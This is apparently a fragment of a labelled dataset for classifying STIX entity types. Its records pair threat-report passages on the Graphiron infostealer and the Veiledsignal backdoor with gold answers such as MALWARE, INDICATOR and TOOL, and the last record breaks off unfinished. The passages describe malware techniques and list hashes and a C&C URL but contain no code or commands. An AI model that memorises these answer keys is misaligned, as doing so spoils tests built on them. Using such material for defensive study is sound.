"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGraphiron\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGrimPlant\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGraphSteel\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nCERT-UA\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nClasiopa\n\n---\n\n### Text Passage:\nClasiopa: New Group Targets Materials Research\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nChrome\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nhttps://www.tradingtechnologies.com/trading/order-management\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwww.tradingtechnologies.com\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nVeiledsignal\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
